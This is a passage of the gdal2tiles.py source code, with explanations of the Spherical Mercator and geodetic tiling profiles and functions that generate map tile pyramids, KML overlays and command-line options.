EPSG:4326 EPSG:3857
.----. --------- -- TMS
/ \ <-> | | <-> /----/ <-> Google
\ / | | /--------/ QuadTree
----- --------- /------------/
KML, public WebMapService Web Clients TileMapService
What is the coordinate extent of Earth in EPSG:3857?
[-20037508.342789244, -20037508.342789244, 20037508.342789244, 20037508.342789244]
Constant 20037508.342789244 comes from the circumference of the Earth in meters,
which is 40 thousand kilometers, the coordinate origin is in the middle of extent.
In fact you can calculate the constant as: 2 * math.pi * 6378137 / 2.0
$ echo 180 85 | gdaltransform -s_srs EPSG:4326 -t_srs EPSG:3857
Polar areas with abs(latitude) bigger than 85.05112878 are clipped off.
What are zoom level constants (pixels/meter) for pyramid with EPSG:3857?
whole region is on top of pyramid (zoom=0) covered by 256x256 pixels tile,
every lower zoom level resolution is always divided by two
initialResolution = 20037508.342789244 * 2 / 256 = 156543.03392804062
What is the difference between TMS and Google Maps/QuadTree tile name convention?
The tile raster itself is the same (equal extent, projection, pixel size),
there is just different identification of the same raster tile.
Tiles in TMS are counted from [0,0] in the bottom-left corner, id is XYZ.
Google placed the origin [0,0] to the top-left corner, reference is XYZ.
Microsoft is referencing tiles by a QuadTree name, defined on the website:
http://msdn2.microsoft.com/en-us/library/bb259689.aspx
The lat/lon coordinates are using WGS84 datum, yes?
Yes, all lat/lon we are mentioning should use WGS84 Geodetic Datum.
Well, the web clients like Google Maps are projecting those coordinates by
Spherical Mercator, so in fact lat/lon coordinates on the sphere are treated as if
they were on the WGS84 ellipsoid.
From MSDN documentation:
To simplify the calculations, we use the spherical form of projection, not
the ellipsoidal form. Since the projection is used only for map display,
and not for displaying numeric coordinates, we don't need the extra precision
of an ellipsoidal projection. The spherical projection causes approximately
0.33 percent scale distortion in the Y direction, which is not visually
noticeable.
How do I create a raster in EPSG:3857 and convert coordinates with PROJ.4?
You can use standard GIS tools like gdalwarp, cs2cs or gdaltransform.
All of these tools support -t_srs 'epsg:3857'.
For other GIS programs check the exact definition of the projection:
More info at http://spatialreference.org/ref/user/google-projection/
The same projection is designated as EPSG:3857. WKT definition is in the
official EPSG database.
Proj4 Text:
+proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0
+k=1.0 +units=m +nadgrids=@null +no_defs
Human readable WKT format of EPSG:3857:
PROJCS["Google Maps Global Mercator",
GEOGCS["WGS 84",
DATUM["WGS_1984",
SPHEROID["WGS 84",6378137,298.257223563,
AUTHORITY["EPSG","7030"]],
AUTHORITY["EPSG","6326"]],
PRIMEM["Greenwich",0],
UNIT["degree",0.0174532925199433],
AUTHORITY["EPSG","4326"]],
PROJECTION["Mercator_1SP"],
PARAMETER["central_meridian",0],
PARAMETER["scale_factor",1],
PARAMETER["false_easting",0],
PARAMETER["false_northing",0],
UNIT["metre",1,
AUTHORITY["EPSG","9001"]]]
"""
def __init__(self, tile_size=256):
"Initialize the TMS Global Mercator pyramid"
self.tile_size = tile_size
self.initialResolution = 2 * math.pi * 6378137 / self.tile_size
# 156543.03392804062 for tile_size 256 pixels
self.originShift = 2 * math.pi * 6378137 / 2.0
# 20037508.342789244
def LatLonToMeters(self, lat, lon):
"Converts given lat/lon in WGS84 Datum to XY in Spherical Mercator EPSG:3857"
mx = lon * self.originShift / 180.0
my = math.log(math.tan((90 + lat) * math.pi / 360.0)) / (math.pi / 180.0)
my = my * self.originShift / 180.0
return mx, my
def MetersToLatLon(self, mx, my):
"Converts XY point from Spherical Mercator EPSG:3857 to lat/lon in WGS84 Datum"
lon = (mx / self.originShift) * 180.0
lat = (my / self.originShift) * 180.0
lat = 180 / math.pi * (2 * math.atan(math.exp(lat * math.pi / 180.0)) - math.pi / 2.0)
return lat, lon
def PixelsToMeters(self, px, py, zoom):
"Converts pixel coordinates in given zoom level of pyramid to EPSG:3857"
res = self.Resolution(zoom)
mx = px * res - self.originShift
my = py * res - self.originShift
return mx, my
def MetersToPixels(self, mx, my, zoom):
"Converts EPSG:3857 to pyramid pixel coordinates in given zoom level"
res = self.Resolution(zoom)
px = (mx + self.originShift) / res
py = (my + self.originShift) / res
return px, py
def PixelsToTile(self, px, py):
"Returns a tile covering region in given pixel coordinates"
tx = int(math.ceil(px / float(self.tile_size)) - 1)
ty = int(math.ceil(py / float(self.tile_size)) - 1)
return tx, ty
def PixelsToRaster(self, px, py, zoom):
"Move the origin of pixel coordinates to top-left corner"
mapSize = self.tile_size << zoom
return px, mapSize - py
def MetersToTile(self, mx, my, zoom):
"Returns tile for given mercator coordinates"
px, py = self.MetersToPixels(mx, my, zoom)
return self.PixelsToTile(px, py)
def TileBounds(self, tx, ty, zoom):
"Returns bounds of the given tile in EPSG:3857 coordinates"
minx, miny = self.PixelsToMeters(tx * self.tile_size, ty * self.tile_size, zoom)
maxx, maxy = self.PixelsToMeters((tx + 1) * self.tile_size, (ty + 1) * self.tile_size, zoom)
return (minx, miny, maxx, maxy)
def TileLatLonBounds(self, tx, ty, zoom):
"Returns bounds of the given tile in latitude/longitude using WGS84 datum"
bounds = self.TileBounds(tx, ty, zoom)
minLat, minLon = self.MetersToLatLon(bounds[0], bounds[1])
maxLat, maxLon = self.MetersToLatLon(bounds[2], bounds[3])
return (minLat, minLon, maxLat, maxLon)
def Resolution(self, zoom):
"Resolution (meters/pixel) for given zoom level (measured at Equator)"
# return (2 * math.pi * 6378137) / (self.tile_size * 2**zoom)
return self.initialResolution / (2**zoom)
def ZoomForPixelSize(self, pixelSize):
"Maximal scaledown zoom of the pyramid closest to the pixelSize."
for i in range(MAXZOOMLEVEL):
if pixelSize > self.Resolution(i):
return max(0, i - 1) # We don't want to scale up
return MAXZOOMLEVEL - 1
def GoogleTile(self, tx, ty, zoom):
"Converts TMS tile coordinates to Google Tile coordinates"
# coordinate origin is moved from bottom-left to top-left corner of the extent
return tx, (2**zoom - 1) - ty
def QuadTree(self, tx, ty, zoom):
"Converts TMS tile coordinates to Microsoft QuadTree"
quadKey = ""
ty = (2**zoom - 1) - ty
for i in range(zoom, 0, -1):
digit = 0
mask = 1 << (i - 1)
if (tx & mask) != 0:
digit += 1
if (ty & mask) != 0:
digit += 2
quadKey += str(digit)
return quadKey
class GlobalGeodetic(object):
r"""
TMS Global Geodetic Profile
---------------------------
Functions necessary for generation of global tiles in Plate Carre projection,
EPSG:4326, "unprojected profile".
Such tiles are compatible with Google Earth (as any other EPSG:4326 rasters)
and you can overlay the tiles on top of OpenLayers base map.
Pixel and tile coordinates are in TMS notation (origin [0,0] in bottom-left).
What coordinate conversions do we need for TMS Global Geodetic tiles?
Global Geodetic tiles are using geodetic coordinates (latitude,longitude)
directly as planar coordinates XY (it is also called Unprojected or Plate
Carre). We need only scaling to pixel pyramid and cutting to tiles.
Pyramid has on top level two tiles, so it is not square but rectangle.
Area [-180,-90,180,90] is scaled to 512x256 pixels.
TMS has coordinate origin (for pixels and tiles) in bottom-left corner.
Rasters are in EPSG:4326 and therefore are compatible with Google Earth.
LatLon <-> Pixels <-> Tiles
WGS84 coordinates Pixels in pyramid Tiles in pyramid
lat/lon XY pixels Z zoom XYZ from TMS
EPSG:4326
.----. ----
/ \ <-> /--------/ <-> TMS
\ / /--------------/
----- /--------------------/
WMS, KML Web Clients, Google Earth TileMapService
"""
def __init__(self, tmscompatible, tile_size=256):
self.tile_size = tile_size
if tmscompatible is not None:
# Defaults the resolution factor to 0.703125 (2 tiles @ level 0)
# Adheres to the OSGeo TMS spec
# http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification#global-geodetic
self.resFact = 180.0 / self.tile_size
else:
# Defaults the resolution factor to 1.40625 (1 tile @ level 0)
# Adheres to the OpenLayers, MapProxy, etc. default resolution for WMTS
self.resFact = 360.0 / self.tile_size
def LonLatToPixels(self, lon, lat, zoom):
"Converts lon/lat to pixel coordinates in given zoom of the EPSG:4326 pyramid"
res = self.resFact / 2**zoom
px = (180 + lon) / res
py = (90 + lat) / res
return px, py
def PixelsToTile(self, px, py):
"Returns coordinates of the tile covering region in pixel coordinates"
tx = int(math.ceil(px / float(self.tile_size)) - 1)
ty = int(math.ceil(py / float(self.tile_size)) - 1)
return tx, ty
def LonLatToTile(self, lon, lat, zoom):
"Returns the tile for zoom which covers given lon/lat coordinates"
px, py = self.LonLatToPixels(lon, lat, zoom)
return self.PixelsToTile(px, py)
def Resolution(self, zoom):
"Resolution (arc/pixel) for given zoom level (measured at Equator)"
return self.resFact / 2**zoom
def ZoomForPixelSize(self, pixelSize):
"Maximal scaledown zoom of the pyramid closest to the pixelSize."
for i in range(MAXZOOMLEVEL):
if pixelSize > self.Resolution(i):
return max(0, i - 1) # We don't want to scale up
return MAXZOOMLEVEL - 1
def TileBounds(self, tx, ty, zoom):
"Returns bounds of the given tile"
res = self.resFact / 2**zoom
return (
tx * self.tile_size * res - 180,
ty * self.tile_size * res - 90,
(tx + 1) * self.tile_size * res - 180,
(ty + 1) * self.tile_size * res - 90
)
def TileLatLonBounds(self, tx, ty, zoom):
"Returns bounds of the given tile in the SWNE form"
b = self.TileBounds(tx, ty, zoom)
return (b[1], b[0], b[3], b[2])
class Zoomify(object):
"""
Tiles compatible with the Zoomify viewer
----------------------------------------
"""
def __init__(self, width, height, tile_size=256, tileformat='jpg'):
"""Initialization of the Zoomify tile tree"""
self.tile_size = tile_size
self.tileformat = tileformat
imagesize = (width, height)
tiles = (math.ceil(width / tile_size), math.ceil(height / tile_size))
# Size (in tiles) for each tier of pyramid.
self.tierSizeInTiles = []
self.tierSizeInTiles.append(tiles)
# Image size in pixels for each pyramid tier
self.tierImageSize = []
self.tierImageSize.append(imagesize)
while (imagesize[0] > tile_size or imagesize[1] > tile_size):
imagesize = (math.floor(imagesize[0] / 2), math.floor(imagesize[1] / 2))
tiles = (math.ceil(imagesize[0] / tile_size), math.ceil(imagesize[1] / tile_size))
self.tierSizeInTiles.append(tiles)
self.tierImageSize.append(imagesize)
self.tierSizeInTiles.reverse()
self.tierImageSize.reverse()
# Depth of the Zoomify pyramid, number of tiers (zoom levels)
self.numberOfTiers = len(self.tierSizeInTiles)
# Number of tiles up to the given tier of pyramid.
self.tileCountUpToTier = []
self.tileCountUpToTier.append(0)
for i in range(1, self.numberOfTiers + 1):
self.tileCountUpToTier.append(
self.tierSizeInTiles[i - 1][0] * self.tierSizeInTiles[i - 1][1] +
self.tileCountUpToTier[i - 1]
)
def tilefilename(self, x, y, z):
"""Returns filename for tile with given coordinates"""
tileIndex = x + y * self.tierSizeInTiles[z][0] + self.tileCountUpToTier[z]
return os.path.join("TileGroup%.0f" % math.floor(tileIndex / 256),
"%s-%s-%s.%s" % (z, x, y, self.tileformat))
class GDALError(Exception):
pass
def exit_with_error(message, details=""):
# Message printing and exit code kept from the way it worked using the OptionParser (in case
# someone parses the error output)
sys.stderr.write("Usage: gdal2tiles.py [options] input_file [output]\n\n")
sys.stderr.write("gdal2tiles.py: error: %s\n" % message)
if details:
sys.stderr.write("\n\n%s\n" % details)
sys.exit(2)
def generate_kml(tx, ty, tz, tileext, tile_size, tileswne, options, children=None, **args):
"""
Template for the KML. Returns filled string.
"""
if not children:
children = []
args['tx'], args['ty'], args['tz'] = tx, ty, tz
args['tileformat'] = tileext
if 'tile_size' not in args:
args['tile_size'] = tile_size
if 'minlodpixels' not in args:
args['minlodpixels'] = int(args['tile_size'] / 2)
if 'maxlodpixels' not in args:
args['maxlodpixels'] = int(args['tile_size'] * 8)
if children == []:
args['maxlodpixels'] = -1
if tx is None:
tilekml = False
args['title'] = options.title
else:
tilekml = True
args['title'] = "%d/%d/%d.kml" % (tz, tx, ty)
args['south'], args['west'], args['north'], args['east'] = tileswne(tx, ty, tz)
if tx == 0:
args['drawOrder'] = 2 * tz + 1
elif tx is not None:
args['drawOrder'] = 2 * tz
else:
args['drawOrder'] = 0
url = options.url
if not url:
if tilekml:
url = "../../"
else:
url = ""
s = """<?xml version="1.0" encoding="utf-8"?>
<kml xmlns="http://www.opengis.net/kml/2.2">
<Document>
<name>%(title)s</name>
<description></description>
<Style>
<ListStyle id="hideChildren">
<listItemType>checkHideChildren</listItemType>
</ListStyle>
</Style>""" % args
if tilekml:
s += """
<Region>
<LatLonAltBox>
<north>%(north).14f</north>
<south>%(south).14f</south>
<east>%(east).14f</east>
<west>%(west).14f</west>
</LatLonAltBox>
<Lod>
<minLodPixels>%(minlodpixels)d</minLodPixels>
<maxLodPixels>%(maxlodpixels)d</maxLodPixels>
</Lod>
</Region>
<GroundOverlay>
<drawOrder>%(drawOrder)d</drawOrder>
<Icon>
<href>%(ty)d.%(tileformat)s</href>
</Icon>
<LatLonBox>
<north>%(north).14f</north>
<south>%(south).14f</south>
<east>%(east).14f</east>
<west>%(west).14f</west>
</LatLonBox>
</GroundOverlay>
""" % args
for cx, cy, cz in children:
csouth, cwest, cnorth, ceast = tileswne(cx, cy, cz)
s += """
<NetworkLink>
<name>%d/%d/%d.%s</name>
<Region>
<LatLonAltBox>
<north>%.14f</north>
<south>%.14f</south>
<east>%.14f</east>
<west>%.14f</west>
</LatLonAltBox>
<Lod>
<minLodPixels>%d</minLodPixels>
<maxLodPixels>-1</maxLodPixels>
</Lod>
</Region>
<Link>
<href>%s%d/%d/%d.kml</href>
<viewRefreshMode>onRegion</viewRefreshMode>
<viewFormat/>
</Link>
</NetworkLink>
""" % (cz, cx, cy, args['tileformat'], cnorth, csouth, ceast, cwest,
args['minlodpixels'], url, cz, cx, cy)
s += """ </Document>
</kml>
"""
return s
def scale_query_to_tile(dsquery, dstile, tiledriver, options, tilefilename=''):
"""Scales down query dataset to the tile dataset"""
querysize = dsquery.RasterXSize
tile_size = dstile.RasterXSize
tilebands = dstile.RasterCount
if options.resampling == 'average':
# Function: gdal.RegenerateOverview()
for i in range(1, tilebands + 1):
# Black border around NODATA
res = gdal.RegenerateOverview(dsquery.GetRasterBand(i), dstile.GetRasterBand(i),
'average')
if res != 0:
exit_with_error("RegenerateOverview() failed on %s, error %d" % (
tilefilename, res))
elif options.resampling == 'antialias' and numpy_available:
# Scaling by PIL (Python Imaging Library) - improved Lanczos
array = numpy.zeros((querysize, querysize, tilebands), numpy.uint8)
for i in range(tilebands):
array[:, :, i] = gdalarray.BandReadAsArray(dsquery.GetRasterBand(i + 1),
0, 0, querysize, querysize)
im = Image.fromarray(array, 'RGBA') # Always four bands
im1 = im.resize((tile_size, tile_size), Image.ANTIALIAS)
if os.path.exists(tilefilename):
im0 = Image.open(tilefilename)
im1 = Image.composite(im1, im0, im1)
im1.save(tilefilename, tiledriver)
else:
if options.resampling == 'near':
gdal_resampling = gdal.GRA_NearestNeighbour
elif options.resampling == 'bilinear':
gdal_resampling = gdal.GRA_Bilinear
elif options.resampling == 'cubic':
gdal_resampling = gdal.GRA_Cubic
elif options.resampling == 'cubicspline':
gdal_resampling = gdal.GRA_CubicSpline
elif options.resampling == 'lanczos':
gdal_resampling = gdal.GRA_Lanczos
# Other algorithms are implemented by gdal.ReprojectImage().
dsquery.SetGeoTransform((0.0, tile_size / float(querysize), 0.0, 0.0, 0.0,
tile_size / float(querysize)))
dstile.SetGeoTransform((0.0, 1.0, 0.0, 0.0, 0.0, 1.0))
res = gdal.ReprojectImage(dsquery, dstile, None, None, gdal_resampling)
if res != 0:
exit_with_error("ReprojectImage() failed on %s, error %d" % (tilefilename, res))
def setup_no_data_values(input_dataset, options):
"""
Extract the NODATA values from the dataset or use the passed arguments as override if any
"""
in_nodata = []
if options.srcnodata:
nds = list(map(float, options.srcnodata.split(',')))
if len(nds) < input_dataset.RasterCount:
in_nodata = (nds * input_dataset.RasterCount)[:input_dataset.RasterCount]
else:
in_nodata = nds
else:
for i in range(1, input_dataset.RasterCount + 1):
raster_no_data = input_dataset.GetRasterBand(i).GetNoDataValue()
if raster_no_data is not None:
in_nodata.append(raster_no_data)
if options.verbose:
print("NODATA: %s" % in_nodata)
return in_nodata
def setup_input_srs(input_dataset, options):
"""
Determines and returns the Input Spatial Reference System (SRS) as an osr object and as a
WKT representation
Uses in priority the one passed in the command line arguments. If None, tries to extract them
from the input dataset
"""
input_srs = None
input_srs_wkt = None
if options.s_srs:
input_srs = osr.SpatialReference()
input_srs.SetFromUserInput(options.s_srs)
input_srs_wkt = input_srs.ExportToWkt()
else:
input_srs_wkt = input_dataset.GetProjection()
if not input_srs_wkt and input_dataset.GetGCPCount() != 0:
input_srs_wkt = input_dataset.GetGCPProjection()
if input_srs_wkt:
input_srs = osr.SpatialReference()
input_srs.ImportFromWkt(input_srs_wkt)
return input_srs, input_srs_wkt
def setup_output_srs(input_srs, options):
"""
Setup the desired SRS (based on options)
"""
output_srs = osr.SpatialReference()
if options.profile == 'mercator':
output_srs.ImportFromEPSG(3857)
elif options.profile == 'geodetic':
output_srs.ImportFromEPSG(4326)
else:
output_srs = input_srs
return output_srs
def has_georeference(dataset):
return (dataset.GetGeoTransform() != (0.0, 1.0, 0.0, 0.0, 0.0, 1.0) or
dataset.GetGCPCount() != 0)
def reproject_dataset(from_dataset, from_srs, to_srs, options=None):
"""
Returns the input dataset in the expected "destination" SRS.
If the dataset is already in the correct SRS, returns it unmodified
"""
if not from_srs or not to_srs:
raise GDALError("from and to SRS must be defined to reproject the dataset")
if (from_srs.ExportToProj4() != to_srs.ExportToProj4()) or (from_dataset.GetGCPCount() != 0):
to_dataset = gdal.AutoCreateWarpedVRT(from_dataset,
from_srs.ExportToWkt(), to_srs.ExportToWkt())
if options and options.verbose:
print("Warping of the raster by AutoCreateWarpedVRT (result saved into 'tiles.vrt')")
to_dataset.GetDriver().CreateCopy("tiles.vrt", to_dataset)
return to_dataset
else:
return from_dataset
def add_gdal_warp_options_to_string(vrt_string, warp_options):
if not warp_options:
return vrt_string
vrt_root = ElementTree.fromstring(vrt_string)
options = vrt_root.find("GDALWarpOptions")
if options is None:
return vrt_string
for key, value in warp_options.items():
tb = ElementTree.TreeBuilder()
tb.start("Option", {"name": key})
tb.data(value)
tb.end("Option")
elem = tb.close()
options.insert(0, elem)
return ElementTree.tostring(vrt_root).decode()
def update_no_data_values(warped_vrt_dataset, nodata_values, options=None):
"""
Takes an array of NODATA values and forces them on the WarpedVRT file dataset passed
"""
# TODO: gbataille - Seems that I forgot tests there
assert nodata_values != []
vrt_string = warped_vrt_dataset.GetMetadata("xml:VRT")[0]
vrt_string = add_gdal_warp_options_to_string(
vrt_string, {"INIT_DEST": "NO_DATA", "UNIFIED_SRC_NODATA": "YES"})
# TODO: gbataille - check the need for this replacement. Seems to work without
# # replace BandMapping tag for NODATA bands....
# for i in range(len(nodata_values)):
# s = s.replace(
# '<BandMapping src="%i" dst="%i"/>' % ((i+1), (i+1)),
# """
# <BandMapping src="%i" dst="%i">
# <SrcNoDataReal>%i</SrcNoDataReal>
# <SrcNoDataImag>0</SrcNoDataImag>
# <DstNoDataReal>%i</DstNoDataReal>
# <DstNoDataImag>0</DstNoDataImag>
# </BandMapping>
# """ % ((i+1), (i+1), nodata_values[i], nodata_values[i]))
corrected_dataset = gdal.Open(vrt_string)
# set NODATA_VALUE metadata
corrected_dataset.SetMetadataItem(
'NODATA_VALUES', ' '.join([str(i) for i in nodata_values]))
if options and options.verbose:
print("Modified warping result saved into 'tiles1.vrt'")
with open("tiles1.vrt", "w") as f:
f.write(corrected_dataset.GetMetadata("xml:VRT")[0])
return corrected_dataset
def add_alpha_band_to_string_vrt(vrt_string):
# TODO: gbataille - Old code speak of this being equivalent to gdalwarp -dstalpha
# To be checked
vrt_root = ElementTree.fromstring(vrt_string)
index = 0
nb_bands = 0
for subelem in list(vrt_root):
if subelem.tag == "VRTRasterBand":
nb_bands += 1
color_node = subelem.find("./ColorInterp")
if color_node is not None and color_node.text == "Alpha":
raise Exception("Alpha band already present")
else:
if nb_bands:
# This means that we are one element after the Band definitions
break
index += 1
tb = ElementTree.TreeBuilder()
tb.start("VRTRasterBand",
{'dataType': "Byte", "band": str(nb_bands + 1), "subClass": "VRTWarpedRasterBand"})
tb.start("ColorInterp", {})
tb.data("Alpha")
tb.end("ColorInterp")
tb.end("VRTRasterBand")
elem = tb.close()
vrt_root.insert(index, elem)
warp_options = vrt_root.find(".//GDALWarpOptions")
tb = ElementTree.TreeBuilder()
tb.start("DstAlphaBand", {})
tb.data(str(nb_bands + 1))
tb.end("DstAlphaBand")
elem = tb.close()
warp_options.append(elem)
# TODO: gbataille - this is a GDALWarpOptions. Why put it in a specific place?
tb = ElementTree.TreeBuilder()
tb.start("Option", {"name": "INIT_DEST"})
tb.data("0")
tb.end("Option")
elem = tb.close()
warp_options.append(elem)
return ElementTree.tostring(vrt_root).decode()
def update_alpha_value_for_non_alpha_inputs(warped_vrt_dataset, options=None):
"""
Handles dataset with 1 or 3 bands, i.e. without alpha channel, in the case the nodata value has
not been forced by options
"""
if warped_vrt_dataset.RasterCount in [1, 3]:
vrt_string = warped_vrt_dataset.GetMetadata("xml:VRT")[0]
vrt_string = add_alpha_band_to_string_vrt(vrt_string)
warped_vrt_dataset = gdal.Open(vrt_string)
if options and options.verbose:
print("Modified -dstalpha warping result saved into 'tiles1.vrt'")
with open("tiles1.vrt", "w") as f:
f.write(warped_vrt_dataset.GetMetadata("xml:VRT")[0])
return warped_vrt_dataset
def nb_data_bands(dataset):
"""
Return the number of data (non-alpha) bands of a gdal dataset
"""
alphaband = dataset.GetRasterBand(1).GetMaskBand()
if ((alphaband.GetMaskFlags() & gdal.GMF_ALPHA) or
dataset.RasterCount == 4 or
dataset.RasterCount == 2):
return dataset.RasterCount - 1
return dataset.RasterCount
def create_base_tile(tile_job_info, tile_detail, queue=None):
dataBandsCount = tile_job_info.nb_data_bands
output = tile_job_info.output_file_path
tileext = tile_job_info.tile_extension
tile_size = tile_job_info.tile_size
options = tile_job_info.options
tilebands = dataBandsCount + 1
cached_ds = getattr(threadLocal, 'cached_ds', None)
if cached_ds and cached_ds.GetDescription() == tile_job_info.src_file:
ds = cached_ds
else:
ds = gdal.Open(tile_job_info.src_file, gdal.GA_ReadOnly)
threadLocal.cached_ds = ds
mem_drv = gdal.GetDriverByName('MEM')
out_drv = gdal.GetDriverByName(tile_job_info.tile_driver)
alphaband = ds.GetRasterBand(1).GetMaskBand()
tx = tile_detail.tx
ty = tile_detail.ty
tz = tile_detail.tz
rx = tile_detail.rx
ry = tile_detail.ry
rxsize = tile_detail.rxsize
rysize = tile_detail.rysize
wx = tile_detail.wx
wy = tile_detail.wy
wxsize = tile_detail.wxsize
wysize = tile_detail.wysize
querysize = tile_detail.querysize
# Tile dataset in memory
tilefilename = os.path.join(
output, str(tz), str(tx), "%s.%s" % (ty, tileext))
dstile = mem_drv.Create('', tile_size, tile_size, tilebands)
data = alpha = None
if options.verbose:
print("\tReadRaster Extent: ",
(rx, ry, rxsize, rysize), (wx, wy, wxsize, wysize))
# Query is in 'nearest neighbour' but can be bigger than the tile_size
# We scale down the query to the tile_size by supplied algorithm.
if rxsize != 0 and rysize != 0 and wxsize != 0 and wysize != 0:
alpha = alphaband.ReadRaster(rx, ry, rxsize, rysize, wxsize, wysize)
# Detect totally transparent tile and skip its creation
if tile_job_info.exclude_transparent and len(alpha) == alpha.count('\x00'.encode('ascii')):
return
data = ds.ReadRaster(rx, ry, rxsize, rysize, wxsize, wysize,
band_list=list(range(1, dataBandsCount + 1)))
# The tile in memory is a transparent file by default. Write pixel values into it if
# any
if data:
if tile_size == querysize:
# Use the ReadRaster result directly in tiles ('nearest neighbour' query)
dstile.WriteRaster(wx, wy, wxsize, wysize, data,
band_list=list(range(1, dataBandsCount + 1)))
dstile.WriteRaster(wx, wy, wxsize, wysize, alpha, band_list=[tilebands])
# Note: For source drivers based on WaveLet compression (JPEG2000, ECW,
# MrSID) the ReadRaster function returns high-quality raster (not ugly
# nearest neighbour)
# TODO: Use directly 'near' for WaveLet files
else:
# Big ReadRaster query in memory scaled to the tile_size - all but 'near'
# algo
dsquery = mem_drv.Create('', querysize, querysize, tilebands)
# TODO: fill the null value in case a tile without alpha is produced (now
# only png tiles are supported)
dsquery.WriteRaster(wx, wy, wxsize, wysize, data,
band_list=list(range(1, dataBandsCount + 1)))
dsquery.WriteRaster(wx, wy, wxsize, wysize, alpha, band_list=[tilebands])
scale_query_to_tile(dsquery, dstile, tile_job_info.tile_driver, options,
tilefilename=tilefilename)
del dsquery
del data
if options.resampling != 'antialias':
# Write a copy of tile to png/jpg
out_drv.CreateCopy(tilefilename, dstile, strict=0)
del dstile
# Create a KML file for this tile.
if tile_job_info.kml:
kmlfilename = os.path.join(output, str(tz), str(tx), '%d.kml' % ty)
if not options.resume or not os.path.exists(kmlfilename):
with open(kmlfilename, 'wb') as f:
f.write(generate_kml(
tx, ty, tz, tile_job_info.tile_extension, tile_job_info.tile_size,
get_tile_swne(tile_job_info, options), tile_job_info.options
).encode('utf-8'))
if queue:
queue.put("tile %s %s %s" % (tx, ty, tz))
def create_overview_tiles(tile_job_info, output_folder, options):
"""Generation of the overview tiles (higher in the pyramid) based on existing tiles"""
mem_driver = gdal.GetDriverByName('MEM')
tile_driver = tile_job_info.tile_driver
out_driver = gdal.GetDriverByName(tile_driver)
tilebands = tile_job_info.nb_data_bands + 1
# Usage of existing tiles: from 4 underlying tiles generate one as overview.
tcount = 0
for tz in range(tile_job_info.tmaxz - 1, tile_job_info.tminz - 1, -1):
tminx, tminy, tmaxx, tmaxy = tile_job_info.tminmax[tz]
tcount += (1 + abs(tmaxx - tminx)) * (1 + abs(tmaxy - tminy))
ti = 0
if tcount == 0:
return
if not options.quiet:
print("Generating Overview Tiles:")
progress_bar = ProgressBar(tcount)
progress_bar.start()
for tz in range(tile_job_info.tmaxz - 1, tile_job_info.tminz - 1, -1):
tminx, tminy, tmaxx, tmaxy = tile_job_info.tminmax[tz]
for ty in range(tmaxy, tminy - 1, -1):
for tx in range(tminx, tmaxx + 1):
ti += 1
tilefilename = os.path.join(output_folder,
str(tz),
str(tx),
"%s.%s" % (ty, tile_job_info.tile_extension))
if options.verbose:
print(ti, '/', tcount, tilefilename)
if options.resume and os.path.exists(tilefilename):
if options.verbose:
print("Tile generation skipped because of --resume")
else:
progress_bar.log_progress()
continue
# Create directories for the tile
if not os.path.exists(os.path.dirname(tilefilename)):
os.makedirs(os.path.dirname(tilefilename))
dsquery = mem_driver.Create('', 2 * tile_job_info.tile_size,
2 * tile_job_info.tile_size, tilebands)
# TODO: fill the null value
dstile = mem_driver.Create('', tile_job_info.tile_size, tile_job_info.tile_size,
tilebands)
# TODO: Implement more clever walking on the tiles with cache functionality
# probably walk should start with reading of four tiles from top left corner
# Hilbert curve
children = []
# Read the tiles and write them to query window
for y in range(2 * ty, 2 * ty + 2):
for x in range(2 * tx, 2 * tx + 2):
minx, miny, maxx, maxy = tile_job_info.tminmax[tz + 1]
if x >= minx and x <= maxx and y >= miny and y <= maxy:
base_tile_path = os.path.join(output_folder, str(tz + 1), str(x),
"%s.%s" % (y, tile_job_info.tile_extension))
if not os.path.isfile(base_tile_path):
continue
dsquerytile = gdal.Open(
base_tile_path,
gdal.GA_ReadOnly)
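# Compute the position of this child tile within the 2x tile_size query window
# (TMS tile y grows northwards while image rows grow downwards, hence the flip).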
if (ty == 0 and y == 1) or (ty != 0 and (y % (2 * ty)) != 0):
tileposy = 0
else:
tileposy = tile_job_info.tile_size
if tx:
tileposx = x % (2 * tx) * tile_job_info.tile_size
elif tx == 0 and x == 1:
tileposx = tile_job_info.tile_size
else:
tileposx = 0
dsquery.WriteRaster(
tileposx, tileposy, tile_job_info.tile_size,
tile_job_info.tile_size,
dsquerytile.ReadRaster(0, 0,
tile_job_info.tile_size,
tile_job_info.tile_size),
band_list=list(range(1, tilebands + 1)))
children.append([x, y, tz + 1])
if children:
scale_query_to_tile(dsquery, dstile, tile_driver, options,
tilefilename=tilefilename)
if options.resampling != 'antialias':
# Write a copy of tile to png/jpg
out_driver.CreateCopy(tilefilename, dstile, strict=0)
if options.verbose:
print("\tbuild from zoom", tz + 1,
" tiles:", (2 * tx, 2 * ty), (2 * tx + 1, 2 * ty),
(2 * tx, 2 * ty + 1), (2 * tx + 1, 2 * ty + 1))
# Create a KML file for this tile.
if tile_job_info.kml:
with open(os.path.join(
output_folder,
'%d/%d/%d.kml' % (tz, tx, ty)
), 'wb') as f:
f.write(generate_kml(
tx, ty, tz, tile_job_info.tile_extension, tile_job_info.tile_size,
get_tile_swne(tile_job_info, options), options, children
).encode('utf-8'))
if not options.verbose and not options.quiet:
progress_bar.log_progress()
def optparse_init():
"""Prepare the option parser for input (argv)"""
from optparse import OptionParser, OptionGroup
usage = "Usage: %prog [options] input_file [output]"
p = OptionParser(usage, version="%prog " + __version__)
p.add_option("-p", "--profile", dest='profile',
type='choice', choices=profile_list,
help=("Tile cutting profile (%s) - default 'mercator' "
"(Google Maps compatible)" % ",".join(profile_list)))
p.add_option("-r", "--resampling", dest="resampling",
type='choice', choices=resampling_list,
help="Resampling method (%s) - default 'average'" % ",".join(resampling_list))
p.add_option('-s', '--s_srs', dest="s_srs", metavar="SRS",
help="The spatial reference system used for the source input data")
p.add_option('-z', '--zoom', dest="zoom",
help="Zoom levels to render (format:'2-5' or '10').")
p.add_option('-e', '--resume', dest="resume", action="store_true",
help="Resume mode. Generate only missing files.")
p.add_option('-a', '--srcnodata', dest="srcnodata", metavar="NODATA",
help="NODATA transparency value to assign to the input data")
p.add_option('-d', '--tmscompatible', dest="tmscompatible", action="store_true",
help=("When using the geodetic profile, specifies the base resolution "
"as 0.703125 or 2 tiles at zoom level 0."))
p.add_option("-v", "--verbose",
action="store_true", dest="verbose",
help="Print status messages to stdout")
p.add_option("-x", "--exclude",
action="store_true", dest="exclude_transparent",
help="Exclude transparent tiles from result tileset")
p.add_option("-q", "--quiet",
action="store_true", dest="quiet",
help="Disable messages and status to stdout")
p.add_option("--processes",
dest="nb_processes",
type='int',
